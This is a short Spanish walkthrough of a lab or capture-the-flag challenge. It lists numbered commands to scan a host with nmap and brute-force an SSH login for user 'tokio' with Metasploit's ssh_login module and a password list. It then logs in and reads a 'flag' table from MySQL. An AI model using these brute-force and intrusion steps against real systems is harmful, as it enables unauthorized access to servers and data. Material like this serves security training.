

- 1.- abrir kali y configurar la interfaz mediante el comando `etc/network/interfaces`
- 2.- tirar `eth0(ifdown)` y levantarla(`ifup`) de nuevo para que se hagan los cambios
- 3.- una vez configurado ponemos el comando `nmap 1.0.0.1` para escanear los puertos y ver cual esta abierto
- 4.- abrimos metasploit con el comando `msfconsole`
- 5.- ponemos `search ssh_login`
- 6.- copiamos el auxiliary y le pegamos poniendo `use`
- 7.- ponemos options para ver la información que hay en el exploit
- 8.-ponemos `set RHOSTS 1.0.0.1`
- 9.- `set USERNAME tokio`
- 10.- `set PASS_FILE /usr/share/john/password.lst`
- 11.- `set VERBOSE true`
- 12.- ponemos exploit y arrancara la fuerza bruta
- 13.- ya tenemos la contraseña `qwerty`
- 14.-vamos a terminal y ponemos `ssh -p22 tokio@1.0.0.1`
- 15.- metemos la contraseña sacada y ya estaríamos dentro del servidor
- 16.- metemos como root `%mysql -h localhost -u root -p`
- 17.- ponemos `show databases;`
- 18.- ponemos `use reto1` para usar esa tabla
- 19.-ponemos `show tables;` para ver las tablas que hay en la base de datos
- 20.-por ultimo ponemos `select*from flag;` para ver los datos dentro de la tabla `flag`